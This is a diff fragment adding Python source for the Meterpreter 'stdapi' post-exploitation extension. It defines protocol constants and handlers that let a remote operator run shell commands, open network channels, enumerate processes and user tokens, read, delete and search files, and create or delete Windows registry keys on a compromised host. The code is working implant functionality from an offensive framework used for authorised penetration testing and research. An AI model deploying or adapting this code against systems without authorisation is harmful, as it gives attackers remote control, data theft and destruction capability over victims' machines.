+TLV_TYPE_PEER_PORT =           TLV_META_TYPE_UINT    | 1501
156
+TLV_TYPE_LOCAL_HOST =          TLV_META_TYPE_STRING  | 1502
157
+TLV_TYPE_LOCAL_PORT =          TLV_META_TYPE_UINT    | 1503
158
+TLV_TYPE_CONNECT_RETRIES =     TLV_META_TYPE_UINT    | 1504
159
+
160
+TLV_TYPE_SHUTDOWN_HOW =        TLV_META_TYPE_UINT    | 1530
161
+
162
+# Registry
163
+TLV_TYPE_HKEY               = TLV_META_TYPE_UINT    | 1000
164
+TLV_TYPE_ROOT_KEY           = TLV_TYPE_HKEY
165
+TLV_TYPE_BASE_KEY           = TLV_META_TYPE_STRING  | 1001
166
+TLV_TYPE_PERMISSION         = TLV_META_TYPE_UINT    | 1002
167
+TLV_TYPE_KEY_NAME           = TLV_META_TYPE_STRING  | 1003
168
+TLV_TYPE_VALUE_NAME         = TLV_META_TYPE_STRING  | 1010
169
+TLV_TYPE_VALUE_TYPE         = TLV_META_TYPE_UINT    | 1011
170
+TLV_TYPE_VALUE_DATA         = TLV_META_TYPE_RAW     | 1012
171
+TLV_TYPE_TARGET_HOST        = TLV_META_TYPE_STRING  | 1013
172
+
173
+# Config
174
+TLV_TYPE_COMPUTER_NAME =       TLV_META_TYPE_STRING  | 1040
175
+TLV_TYPE_OS_NAME =             TLV_META_TYPE_STRING  | 1041
176
+TLV_TYPE_USER_NAME =           TLV_META_TYPE_STRING  | 1042
177
+TLV_TYPE_ARCHITECTURE  =       TLV_META_TYPE_STRING  | 1043
178
+
179
+DELETE_KEY_FLAG_RECURSIVE = (1 << 0)
180
+
181
+# Process
182
+TLV_TYPE_BASE_ADDRESS =        TLV_META_TYPE_UINT    | 2000
183
+TLV_TYPE_ALLOCATION_TYPE =     TLV_META_TYPE_UINT    | 2001
184
+TLV_TYPE_PROTECTION =          TLV_META_TYPE_UINT    | 2002
185
+TLV_TYPE_PROCESS_PERMS =       TLV_META_TYPE_UINT    | 2003
186
+TLV_TYPE_PROCESS_MEMORY =      TLV_META_TYPE_RAW     | 2004
187
+TLV_TYPE_ALLOC_BASE_ADDRESS =  TLV_META_TYPE_UINT    | 2005
188
+TLV_TYPE_MEMORY_STATE =        TLV_META_TYPE_UINT    | 2006
189
+TLV_TYPE_MEMORY_TYPE =         TLV_META_TYPE_UINT    | 2007
190
+TLV_TYPE_ALLOC_PROTECTION =    TLV_META_TYPE_UINT    | 2008
191
+TLV_TYPE_PID =                 TLV_META_TYPE_UINT    | 2300
192
+TLV_TYPE_PROCESS_NAME =        TLV_META_TYPE_STRING  | 2301
193
+TLV_TYPE_PROCESS_PATH =        TLV_META_TYPE_STRING  | 2302
194
+TLV_TYPE_PROCESS_GROUP =       TLV_META_TYPE_GROUP   | 2303
195
+TLV_TYPE_PROCESS_FLAGS =       TLV_META_TYPE_UINT    | 2304
196
+TLV_TYPE_PROCESS_ARGUMENTS =   TLV_META_TYPE_STRING  | 2305
197
+TLV_TYPE_PROCESS_ARCH =        TLV_META_TYPE_UINT    | 2306
198
+TLV_TYPE_PARENT_PID =          TLV_META_TYPE_UINT    | 2307
199
+
200
+TLV_TYPE_IMAGE_FILE =          TLV_META_TYPE_STRING  | 2400
201
+TLV_TYPE_IMAGE_FILE_PATH =     TLV_META_TYPE_STRING  | 2401
202
+TLV_TYPE_PROCEDURE_NAME =      TLV_META_TYPE_STRING  | 2402
203
+TLV_TYPE_PROCEDURE_ADDRESS =   TLV_META_TYPE_UINT    | 2403
204
+TLV_TYPE_IMAGE_BASE =          TLV_META_TYPE_UINT    | 2404
205
+TLV_TYPE_IMAGE_GROUP =         TLV_META_TYPE_GROUP   | 2405
206
+TLV_TYPE_IMAGE_NAME =          TLV_META_TYPE_STRING  | 2406
207
+
208
+TLV_TYPE_THREAD_ID =           TLV_META_TYPE_UINT    | 2500
209
+TLV_TYPE_THREAD_PERMS =        TLV_META_TYPE_UINT    | 2502
210
+TLV_TYPE_EXIT_CODE =           TLV_META_TYPE_UINT    | 2510
211
+TLV_TYPE_ENTRY_POINT =         TLV_META_TYPE_UINT    | 2511
212
+TLV_TYPE_ENTRY_PARAMETER =     TLV_META_TYPE_UINT    | 2512
213
+TLV_TYPE_CREATION_FLAGS =      TLV_META_TYPE_UINT    | 2513
214
+
215
+TLV_TYPE_REGISTER_NAME =       TLV_META_TYPE_STRING  | 2540
216
+TLV_TYPE_REGISTER_SIZE =       TLV_META_TYPE_UINT    | 2541
217
+TLV_TYPE_REGISTER_VALUE_32 =   TLV_META_TYPE_UINT    | 2542
218
+TLV_TYPE_REGISTER =            TLV_META_TYPE_GROUP   | 2550
219
+
220
+##
221
+# Ui
222
+##
223
+TLV_TYPE_IDLE_TIME =           TLV_META_TYPE_UINT    | 3000
224
+TLV_TYPE_KEYS_DUMP =           TLV_META_TYPE_STRING  | 3001
225
+TLV_TYPE_DESKTOP =             TLV_META_TYPE_STRING  | 3002
226
+
227
+##
228
+# Event Log
229
+##
230
+TLV_TYPE_EVENT_SOURCENAME =    TLV_META_TYPE_STRING  | 4000
231
+TLV_TYPE_EVENT_HANDLE =        TLV_META_TYPE_UINT    | 4001
232
+TLV_TYPE_EVENT_NUMRECORDS =    TLV_META_TYPE_UINT    | 4002
233
+
234
+TLV_TYPE_EVENT_READFLAGS =     TLV_META_TYPE_UINT    | 4003
235
+TLV_TYPE_EVENT_RECORDOFFSET =  TLV_META_TYPE_UINT    | 4004
236
+
237
+TLV_TYPE_EVENT_RECORDNUMBER =  TLV_META_TYPE_UINT    | 4006
238
+TLV_TYPE_EVENT_TIMEGENERATED = TLV_META_TYPE_UINT    | 4007
239
+TLV_TYPE_EVENT_TIMEWRITTEN =   TLV_META_TYPE_UINT    | 4008
240
+TLV_TYPE_EVENT_ID =            TLV_META_TYPE_UINT    | 4009
241
+TLV_TYPE_EVENT_TYPE =          TLV_META_TYPE_UINT    | 4010
242
+TLV_TYPE_EVENT_CATEGORY =      TLV_META_TYPE_UINT    | 4011
243
+TLV_TYPE_EVENT_STRING =        TLV_META_TYPE_STRING  | 4012
244
+TLV_TYPE_EVENT_DATA =          TLV_META_TYPE_RAW     | 4013
245
+
246
+##
247
+# Power
248
+##
249
+TLV_TYPE_POWER_FLAGS =         TLV_META_TYPE_UINT    | 4100
250
+TLV_TYPE_POWER_REASON =        TLV_META_TYPE_UINT    | 4101
251
+
252
+##
253
+# Sys
254
+##
255
+PROCESS_EXECUTE_FLAG_HIDDEN = (1 << 0)
256
+PROCESS_EXECUTE_FLAG_CHANNELIZED = (1 << 1)
257
+PROCESS_EXECUTE_FLAG_SUSPENDED = (1 << 2)
258
+PROCESS_EXECUTE_FLAG_USE_THREAD_TOKEN = (1 << 3)
259
+
260
+PROCESS_ARCH_UNKNOWN = 0
261
+PROCESS_ARCH_X86 = 1
262
+PROCESS_ARCH_X64 = 2
263
+PROCESS_ARCH_IA64 = 3
264
+
265
+##
266
+# Errors
267
+##
268
+ERROR_SUCCESS = 0
269
+# not defined in original C implementation
270
+ERROR_FAILURE = 1
271
+
272
+# Special return value to match up with Windows error codes for network
273
+# errors.
274
+ERROR_CONNECTION_ERROR = 10000
275
+
276
+def get_stat_buffer(path):
277
+	si = os.stat(path)
278
+	rdev = 0
279
+	if hasattr(si, 'st_rdev'):
280
+		rdev = si.st_rdev
281
+	blksize = 0
282
+	if hasattr(si, 'st_blksize'):
283
+		blksize = si.st_blksize
284
+	blocks = 0
285
+	if hasattr(si, 'st_blocks'):
286
+		blocks = si.st_blocks
287
+	st_buf = struct.pack('<IHHH', si.st_dev, min(0xffff, si.st_ino), si.st_mode, si.st_nlink)
288
+	st_buf += struct.pack('<HHHI', si.st_uid, si.st_gid, 0, rdev)
289
+	st_buf += struct.pack('<IIII', si.st_size, si.st_atime, si.st_mtime, si.st_ctime)
290
+	st_buf += struct.pack('<II', blksize, blocks)
291
+	return st_buf
292
+
293
+def windll_GetNativeSystemInfo():
294
+	if not has_windll:
295
+		return None
296
+	sysinfo = SYSTEM_INFO()
297
+	ctypes.windll.kernel32.GetNativeSystemInfo(ctypes.byref(sysinfo))
298
+	return {0:PROCESS_ARCH_X86, 6:PROCESS_ARCH_IA64, 9:PROCESS_ARCH_X64}.get(sysinfo.wProcessorArchitecture, PROCESS_ARCH_UNKNOWN)
299
+
300
+@meterpreter.register_function
301
+def channel_create_stdapi_fs_file(request, response):
302
+	fpath = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
303
+	fmode = packet_get_tlv(request, TLV_TYPE_FILE_MODE)
304
+	if fmode:
305
+		fmode = fmode['value']
306
+		fmode = fmode.replace('bb', 'b')
307
+	else:
308
+		fmode = 'rb'
309
+	file_h = open(fpath, fmode)
310
+	channel_id = meterpreter.add_channel(file_h)
311
+	response += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
312
+	return ERROR_SUCCESS, response
313
+
314
+@meterpreter.register_function
315
+def channel_create_stdapi_net_tcp_client(request, response):
316
+	host = packet_get_tlv(request, TLV_TYPE_PEER_HOST)['value']
317
+	port = packet_get_tlv(request, TLV_TYPE_PEER_PORT)['value']
318
+	local_host = packet_get_tlv(request, TLV_TYPE_LOCAL_HOST)
319
+	local_port = packet_get_tlv(request, TLV_TYPE_LOCAL_PORT)
320
+	retries = packet_get_tlv(request, TLV_TYPE_CONNECT_RETRIES).get('value', 1)
321
+	connected = False
322
+	for i in range(retries + 1):
323
+		sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
324
+		sock.settimeout(3.0)
325
+		if local_host.get('value') and local_port.get('value'):
326
+			sock.bind((local_host['value'], local_port['value']))
327
+		try:
328
+			sock.connect((host, port))
329
+			connected = True
330
+			break
331
+		except:
332
+			pass
333
+	if not connected:
334
+		return ERROR_CONNECTION_ERROR, response
335
+	channel_id = meterpreter.add_channel(sock)
336
+	response += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
337
+	return ERROR_SUCCESS, response
338
+
339
+@meterpreter.register_function
340
+def stdapi_sys_config_getuid(request, response):
341
+	response += tlv_pack(TLV_TYPE_USER_NAME, getpass.getuser())
342
+	return ERROR_SUCCESS, response
343
+
344
+@meterpreter.register_function
345
+def stdapi_sys_config_sysinfo(request, response):
346
+	uname_info = platform.uname()
347
+	response += tlv_pack(TLV_TYPE_COMPUTER_NAME, uname_info[1])
348
+	response += tlv_pack(TLV_TYPE_OS_NAME, uname_info[0] + ' ' + uname_info[2] + ' ' + uname_info[3])
349
+	arch = uname_info[4]
350
+	if has_windll:
351
+		arch = windll_GetNativeSystemInfo()
352
+		if arch == PROCESS_ARCH_IA64:
353
+			arch = 'IA64'
354
+		elif arch == PROCESS_ARCH_X64:
355
+			arch = 'x86_64'
356
+		elif arch == PROCESS_ARCH_X86:
357
+			arch = 'x86'
358
+		else:
359
+			arch = uname_info[4]
360
+	response += tlv_pack(TLV_TYPE_ARCHITECTURE, arch)
361
+	return ERROR_SUCCESS, response
362
+
363
+@meterpreter.register_function
364
+def stdapi_sys_process_close(request, response):
365
+	proc_h_id = packet_get_tlv(request, TLV_TYPE_PROCESS_HANDLE)
366
+	if not proc_h_id:
367
+		return ERROR_SUCCESS, response
368
+	proc_h_id = proc_h_id['value']
369
+	proc_h = meterpreter.channels[proc_h_id]
370
+	proc_h.kill()
371
+	return ERROR_SUCCESS, response
372
+
373
+@meterpreter.register_function
374
+def stdapi_sys_process_execute(request, response):
375
+	cmd = packet_get_tlv(request, TLV_TYPE_PROCESS_PATH)['value']
376
+	raw_args = packet_get_tlv(request, TLV_TYPE_PROCESS_ARGUMENTS)
377
+	if raw_args:
378
+		raw_args = raw_args['value']
379
+	else:
380
+		raw_args = ""
381
+	flags = packet_get_tlv(request, TLV_TYPE_PROCESS_FLAGS)['value']
382
+	if len(cmd) == 0:
383
+		return ERROR_FAILURE, response
384
+	if os.path.isfile('/bin/sh'):
385
+		args = ['/bin/sh', '-c', cmd + ' ' + raw_args]
386
+	else:
387
+		args = [cmd]
388
+		args.extend(shlex.split(raw_args))
389
+	if (flags & PROCESS_EXECUTE_FLAG_CHANNELIZED):
390
+		if has_pty:
391
+			master, slave = pty.openpty()
392
+			if has_termios:
393
+				settings = termios.tcgetattr(master)
394
+				settings[3] = settings[3] & ~termios.ECHO
395
+				termios.tcsetattr(master, termios.TCSADRAIN, settings)
396
+			proc_h = STDProcess(args, stdin=slave, stdout=slave, stderr=slave, bufsize=0)
397
+			proc_h.stdin = os.fdopen(master, 'wb')
398
+			proc_h.stdout = os.fdopen(master, 'rb')
399
+			proc_h.stderr = open(os.devnull, 'rb')
400
+		else:
401
+			proc_h = STDProcess(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
402
+		proc_h.start()
403
+	else:
404
+		proc_h = subprocess.Popen(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
405
+	proc_h_id = meterpreter.add_process(proc_h)
406
+	response += tlv_pack(TLV_TYPE_PID, proc_h.pid)
407
+	response += tlv_pack(TLV_TYPE_PROCESS_HANDLE, proc_h_id)
408
+	if (flags & PROCESS_EXECUTE_FLAG_CHANNELIZED):
409
+		channel_id = meterpreter.add_channel(proc_h)
410
+		response += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
411
+	return ERROR_SUCCESS, response
412
+
413
+@meterpreter.register_function
414
+def stdapi_sys_process_getpid(request, response):
415
+	response += tlv_pack(TLV_TYPE_PID, os.getpid())
416
+	return ERROR_SUCCESS, response
417
+
418
+def stdapi_sys_process_get_processes_via_proc(request, response):
419
+	for pid in os.listdir('/proc'):
420
+		pgroup = ''
421
+		if not os.path.isdir(os.path.join('/proc', pid)) or not pid.isdigit():
422
+			continue
423
+		cmd = open(os.path.join('/proc', pid, 'cmdline'), 'rb').read(512).replace('\x00', ' ')
424
+		status_data = open(os.path.join('/proc', pid, 'status'), 'rb').read()
425
+		status_data = map(lambda x: x.split('\t',1), status_data.split('\n'))
426
+		status_data = filter(lambda x: len(x) == 2, status_data)
427
+		status = {}
428
+		for k, v in status_data:
429
+			status[k[:-1]] = v.strip()
430
+		ppid = status.get('PPid')
431
+		uid = status.get('Uid').split('\t', 1)[0]
432
+		if has_pwd:
433
+			uid = pwd.getpwuid(int(uid)).pw_name
434
+		if cmd:
435
+			pname = os.path.basename(cmd.split(' ', 1)[0])
436
+			ppath = cmd
437
+		else:
438
+			pname = '[' + status['Name'] + ']'
439
+			ppath = ''
440
+		pgroup += tlv_pack(TLV_TYPE_PID, int(pid))
441
+		if ppid:
442
+			pgroup += tlv_pack(TLV_TYPE_PARENT_PID, int(ppid))
443
+		pgroup += tlv_pack(TLV_TYPE_USER_NAME, uid)
444
+		pgroup += tlv_pack(TLV_TYPE_PROCESS_NAME, pname)
445
+		pgroup += tlv_pack(TLV_TYPE_PROCESS_PATH, ppath)
446
+		response += tlv_pack(TLV_TYPE_PROCESS_GROUP, pgroup)
447
+	return ERROR_SUCCESS, response
448
+
449
+def stdapi_sys_process_get_processes_via_ps(request, response):
450
+	ps_args = ['ps', 'ax', '-w', '-o', 'pid,ppid,user,command']
451
+	proc_h = subprocess.Popen(ps_args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
452
+	ps_output = proc_h.stdout.read()
453
+	ps_output = ps_output.split('\n')
454
+	ps_output.pop(0)
455
+	for process in ps_output:
456
+		process = process.split()
457
+		if len(process) < 4:
458
+			break
459
+		pgroup = ''
460
+		pgroup += tlv_pack(TLV_TYPE_PID, int(process[0]))
461
+		pgroup += tlv_pack(TLV_TYPE_PARENT_PID, int(process[1]))
462
+		pgroup += tlv_pack(TLV_TYPE_USER_NAME, process[2])
463
+		pgroup += tlv_pack(TLV_TYPE_PROCESS_NAME, os.path.basename(process[3]))
464
+		pgroup += tlv_pack(TLV_TYPE_PROCESS_PATH, ' '.join(process[3:]))
465
+		response += tlv_pack(TLV_TYPE_PROCESS_GROUP, pgroup)
466
+	return ERROR_SUCCESS, response
467
+
468
+def stdapi_sys_process_get_processes_via_windll(request, response):
469
+	TH32CS_SNAPPROCESS = 2
470
+	PROCESS_QUERY_INFORMATION = 0x0400
471
+	PROCESS_QUERY_LIMITED_INFORMATION = 0x1000
472
+	PROCESS_VM_READ = 0x10
473
+	TOKEN_QUERY = 0x0008
474
+	TokenUser = 1
475
+	k32 = ctypes.windll.kernel32
476
+	pe32 = PROCESSENTRY32()
477
+	pe32.dwSize = ctypes.sizeof(PROCESSENTRY32)
478
+	proc_snap = k32.CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)
479
+	result = k32.Process32First(proc_snap, ctypes.byref(pe32))
480
+	if not result:
481
+		return ERROR_FAILURE, response
482
+	while result:
483
+		proc_h = k32.OpenProcess((PROCESS_QUERY_INFORMATION | PROCESS_VM_READ), False, pe32.th32ProcessID)
484
+		if not proc_h:
485
+			proc_h = k32.OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, False, pe32.th32ProcessID)
486
+		exe_path = (ctypes.c_char * 1024)()
487
+		success = False
488
+		if hasattr(ctypes.windll.psapi, 'GetModuleFileNameExA'):
489
+			success = ctypes.windll.psapi.GetModuleFileNameExA(proc_h, 0, exe_path, ctypes.sizeof(exe_path))
490
+		elif hasattr(k32, 'GetModuleFileNameExA'):
491
+			success = k32.GetModuleFileNameExA(proc_h, 0, exe_path, ctypes.sizeof(exe_path))
492
+		if not success and hasattr(k32, 'QueryFullProcessImageNameA'):
493
+			dw_sz = ctypes.c_uint32()
494
+			dw_sz.value = ctypes.sizeof(exe_path)
495
+			success = k32.QueryFullProcessImageNameA(proc_h, 0, exe_path, ctypes.byref(dw_sz))
496
+		if not success and hasattr(ctypes.windll.psapi, 'GetProcessImageFileNameA'):
497
+			success = ctypes.windll.psapi.GetProcessImageFileNameA(proc_h, exe_path, ctypes.sizeof(exe_path))
498
+		if success:
499
+			exe_path = ctypes.string_at(exe_path)
500
+		else:
501
+			exe_path = ''
502
+		complete_username = ''
503
+		tkn_h = ctypes.c_long()
504
+		tkn_len = ctypes.c_uint32()
505
+		if ctypes.windll.advapi32.OpenProcessToken(proc_h, TOKEN_QUERY, ctypes.byref(tkn_h)):
506
+			ctypes.windll.advapi32.GetTokenInformation(tkn_h, TokenUser, None, 0, ctypes.byref(tkn_len))
507
+			buf = (ctypes.c_ubyte * tkn_len.value)()
508
+			if ctypes.windll.advapi32.GetTokenInformation(tkn_h, TokenUser, ctypes.byref(buf), ctypes.sizeof(buf), ctypes.byref(tkn_len)):
509
+				user_tkn = SID_AND_ATTRIBUTES()
510
+				ctypes.memmove(ctypes.byref(user_tkn), buf, ctypes.sizeof(user_tkn))
511
+				username = (ctypes.c_char * 512)()
512
+				domain = (ctypes.c_char * 512)()
513
+				u_len = ctypes.c_uint32()
514
+				u_len.value = ctypes.sizeof(username)
515
+				d_len = ctypes.c_uint32()
516
+				d_len.value = ctypes.sizeof(domain)
517
+				use = ctypes.c_ulong()
518
+				use.value = 0
519
+				ctypes.windll.advapi32.LookupAccountSidA(None, user_tkn.Sid, username, ctypes.byref(u_len), domain, ctypes.byref(d_len), ctypes.byref(use))
520
+				complete_username = ctypes.string_at(domain) + '\\' + ctypes.string_at(username)
521
+			k32.CloseHandle(tkn_h)
522
+		parch = windll_GetNativeSystemInfo()
523
+		is_wow64 = ctypes.c_ubyte()
524
+		is_wow64.value = 0
525
+		if hasattr(k32, 'IsWow64Process'):
526
+			if k32.IsWow64Process(proc_h, ctypes.byref(is_wow64)):
527
+				if is_wow64.value:
528
+					parch = PROCESS_ARCH_X86
529
+		pgroup = ''
530
+		pgroup += tlv_pack(TLV_TYPE_PID, pe32.th32ProcessID)
531
+		pgroup += tlv_pack(TLV_TYPE_PARENT_PID, pe32.th32ParentProcessID)
532
+		pgroup += tlv_pack(TLV_TYPE_USER_NAME, complete_username)
533
+		pgroup += tlv_pack(TLV_TYPE_PROCESS_NAME, pe32.szExeFile)
534
+		pgroup += tlv_pack(TLV_TYPE_PROCESS_PATH, exe_path)
535
+		pgroup += tlv_pack(TLV_TYPE_PROCESS_ARCH, parch)
536
+		response += tlv_pack(TLV_TYPE_PROCESS_GROUP, pgroup)
537
+		result = k32.Process32Next(proc_snap, ctypes.byref(pe32))
538
+		k32.CloseHandle(proc_h)
539
+	k32.CloseHandle(proc_snap)
540
+	return ERROR_SUCCESS, response
541
+
542
+@meterpreter.register_function
543
+def stdapi_sys_process_get_processes(request, response):
544
+	if os.path.isdir('/proc'):
545
+		return stdapi_sys_process_get_processes_via_proc(request, response)
546
+	elif has_windll:
547
+		return stdapi_sys_process_get_processes_via_windll(request, response)
548
+	else:
549
+		return stdapi_sys_process_get_processes_via_ps(request, response)
550
+	return ERROR_FAILURE, response
551
+
552
+@meterpreter.register_function
553
+def stdapi_fs_chdir(request, response):
554
+	wd = packet_get_tlv(request, TLV_TYPE_DIRECTORY_PATH)['value']
555
+	os.chdir(wd)
556
+	return ERROR_SUCCESS, response
557
+
558
+@meterpreter.register_function
559
+def stdapi_fs_delete(request, response):
560
+	file_path = packet_get_tlv(request, TLV_TYPE_FILE_NAME)['value']
561
+	os.unlink(file_path)
562
+	return ERROR_SUCCESS, response
563
+
564
+@meterpreter.register_function
565
+def stdapi_fs_delete_dir(request, response):
566
+	dir_path = packet_get_tlv(request, TLV_TYPE_DIRECTORY_PATH)['value']
567
+	if os.path.islink(dir_path):
568
+		del_func = os.unlink
569
+	else:
570
+		del_func = shutil.rmtree
571
+	del_func(dir_path)
572
+	return ERROR_SUCCESS, response
573
+
574
+@meterpreter.register_function
575
+def stdapi_fs_delete_file(request, response):
576
+	file_path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
577
+	os.unlink(file_path)
578
+	return ERROR_SUCCESS, response
579
+
580
+@meterpreter.register_function
581
+def stdapi_fs_file_expand_path(request, response):
582
+	path_tlv = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
583
+	if has_windll:
584
+		path_out = (ctypes.c_char * 4096)()
585
+		path_out_len = ctypes.windll.kernel32.ExpandEnvironmentStringsA(path_tlv, ctypes.byref(path_out), ctypes.sizeof(path_out))
586
+		result = ''.join(path_out)[:path_out_len]
587
+	elif path_tlv == '%COMSPEC%':
588
+		result = '/bin/sh'
589
+	elif path_tlv in ['%TEMP%', '%TMP%']:
590
+		result = '/tmp'
591
+	else:
592
+		result = os.getenv(path_tlv, path_tlv)
593
+	if not result:
594
+		return ERROR_FAILURE, response
595
+	response += tlv_pack(TLV_TYPE_FILE_PATH, result)
596
+	return ERROR_SUCCESS, response
597
+
598
+@meterpreter.register_function
599
+def stdapi_fs_file_move(request, response):
600
+	oldname = packet_get_tlv(request, TLV_TYPE_FILE_NAME)['value']
601
+	newname = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
602
+	os.rename(oldname, newname)
603
+	return ERROR_SUCCESS, response
604
+
605
+@meterpreter.register_function
606
+def stdapi_fs_getwd(request, response):
607
+	response += tlv_pack(TLV_TYPE_DIRECTORY_PATH, os.getcwd())
608
+	return ERROR_SUCCESS, response
609
+
610
+@meterpreter.register_function
611
+def stdapi_fs_ls(request, response):
612
+	path = packet_get_tlv(request, TLV_TYPE_DIRECTORY_PATH)['value']
613
+	path = os.path.abspath(path)
614
+	contents = os.listdir(path)
615
+	contents.sort()
616
+	for x in contents:
617
+		y = os.path.join(path, x)
618
+		response += tlv_pack(TLV_TYPE_FILE_NAME, x)
619
+		response += tlv_pack(TLV_TYPE_FILE_PATH, y)
620
+		response += tlv_pack(TLV_TYPE_STAT_BUF, get_stat_buffer(y))
621
+	return ERROR_SUCCESS, response
622
+
623
+@meterpreter.register_function
624
+def stdapi_fs_md5(request, response):
625
+	if sys.version_info[0] == 2 and sys.version_info[1] < 5:
626
+		import md5
627
+		m = md5.new()
628
+	else:
629
+		import hashlib
630
+		m = hashlib.md5()
631
+	path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
632
+	m.update(open(path, 'rb').read())
633
+	response += tlv_pack(TLV_TYPE_FILE_NAME, m.digest())
634
+	return ERROR_SUCCESS, response
635
+
636
+@meterpreter.register_function
637
+def stdapi_fs_mkdir(request, response):
638
+	dir_path = packet_get_tlv(request, TLV_TYPE_DIRECTORY_PATH)['value']
639
+	os.mkdir(dir_path)
640
+	return ERROR_SUCCESS, response
641
+
642
+@meterpreter.register_function
643
+def stdapi_fs_search(request, response):
644
+	search_root = packet_get_tlv(request, TLV_TYPE_SEARCH_ROOT).get('value', '.')
645
+	search_root = ('' or '.') # sometimes it's an empty string
646
+	glob = packet_get_tlv(request, TLV_TYPE_SEARCH_GLOB)['value']
647
+	recurse = packet_get_tlv(request, TLV_TYPE_SEARCH_RECURSE)['value']
648
+	if recurse:
649
+		for root, dirs, files in os.walk(search_root):
650
+			for f in filter(lambda f: fnmatch.fnmatch(f, glob), files):
651
+				file_tlv  = ''
652
+				file_tlv += tlv_pack(TLV_TYPE_FILE_PATH, root)
653
+				file_tlv += tlv_pack(TLV_TYPE_FILE_NAME, f)
654
+				file_tlv += tlv_pack(TLV_TYPE_FILE_SIZE, os.stat(os.path.join(root, f)).st_size)
655
+				response += tlv_pack(TLV_TYPE_SEARCH_RESULTS, file_tlv)
656
+	else:
657
+		for f in filter(lambda f: fnmatch.fnmatch(f, glob), os.listdir(search_root)):
658
+			file_tlv  = ''
659
+			file_tlv += tlv_pack(TLV_TYPE_FILE_PATH, search_root)
660
+			file_tlv += tlv_pack(TLV_TYPE_FILE_NAME, f)
661
+			file_tlv += tlv_pack(TLV_TYPE_FILE_SIZE, os.stat(os.path.join(search_root, f)).st_size)
662
+			response += tlv_pack(TLV_TYPE_SEARCH_RESULTS, file_tlv)
663
+	return ERROR_SUCCESS, response
664
+
665
+@meterpreter.register_function
666
+def stdapi_fs_separator(request, response):
667
+	response += tlv_pack(TLV_TYPE_STRING, os.sep)
668
+	return ERROR_SUCCESS, response
669
+
670
+@meterpreter.register_function
671
+def stdapi_fs_sha1(request, response):
672
+	if sys.version_info[0] == 2 and sys.version_info[1] < 5:
673
+		import sha1
674
+		m = sha1.new()
675
+	else:
676
+		import hashlib
677
+		m = hashlib.sha1()
678
+	path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
679
+	m.update(open(path, 'rb').read())
680
+	response += tlv_pack(TLV_TYPE_FILE_NAME, m.digest())
681
+	return ERROR_SUCCESS, response
682
+
683
+@meterpreter.register_function
684
+def stdapi_fs_stat(request, response):
685
+	path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
686
+	st_buf = get_stat_buffer(path)
687
+	response += tlv_pack(TLV_TYPE_STAT_BUF, st_buf)
688
+	return ERROR_SUCCESS, response
689
+
690
+@meterpreter.register_function
691
+def stdapi_net_socket_tcp_shutdown(request, response):
692
+	channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)
693
+	channel = meterpreter.channels[channel_id]
694
+	channel.close()
695
+	return ERROR_SUCCESS, response
696
+
697
+@meterpreter.register_function_windll
698
+def stdapi_registry_close_key(request, response):
699
+	hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value']
700
+	result = ctypes.windll.advapi32.RegCloseKey(hkey)
701
+	return ERROR_SUCCESS, response
702
+
703
+@meterpreter.register_function_windll
704
+def stdapi_registry_create_key(request, response):
705
+	root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
706
+	base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value']
707
+	permission = packet_get_tlv(request, TLV_TYPE_PERMISSION).get('value', winreg.KEY_ALL_ACCESS)
708
+	res_key = ctypes.c_void_p()
709
+	if ctypes.windll.advapi32.RegCreateKeyExA(root_key, base_key, 0, None, 0, permission, None, ctypes.byref(res_key), None) == ERROR_SUCCESS:
710
+		response += tlv_pack(TLV_TYPE_HKEY, res_key.value)
711
+		return ERROR_SUCCESS, response
712
+	return ERROR_FAILURE, response
713
+
714
+@meterpreter.register_function_windll
715
+def stdapi_registry_delete_key(request, response):
716
+	root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
717
+	base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value']
718
+	flags = packet_get_tlv(request, TLV_TYPE_FLAGS)['value']
719
+	if (flags & DELETE_KEY_FLAG_RECURSIVE):
720
+		result = ctypes.windll.shlwapi.SHDeleteKeyA(root_key, base_key)
721
+	else:
722
+		result = ctypes.windll.advapi32.RegDeleteKeyA(root_key, base_key)
723
+	return result, response
724
+
725
+@meterpreter.register_function_windll
726
+def stdapi_registry_delete_value(request, response):
727
+	root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
728
+	value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value']
729
+	result = ctypes.windll.advapi32.RegDeleteValueA(root_key, value_name)
730
+	return result, response
731
+
732
+@meterpreter.register_function_windll
733
+def stdapi_registry_enum_key(request, response):
734
+	ERROR_MORE_DATA = 0xea
735
+	ERROR_NO_MORE_ITEMS = 0x0103
736
+	hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value']
737
+	name = (ctypes.c_char * 4096)()
738
+	index = 0
739
+	tries = 0
740
+	while True:
741
+		result = ctypes.windll.advapi32.RegEnumKeyA(hkey, index, name, ctypes.sizeof(name))
742
+		if result == ERROR_MORE_DATA:
743
+			if tries > 3:
744
+				break
745
+			name = (ctypes.c_char * (ctypes.sizeof(name) * 2))
746
+			tries += 1
747
+			continue
748
+		elif result == ERROR_NO_MORE_ITEMS:
749
+			result = ERROR_SUCCESS
750
+			break
751
+		elif result != ERROR_SUCCESS:
752
+			break
753
+		tries = 0
754
+		response += tlv_pack(TLV_TYPE_KEY_NAME, ctypes.string_at(name))
755
+		index += 1
756
+	return result, response
757
+
758
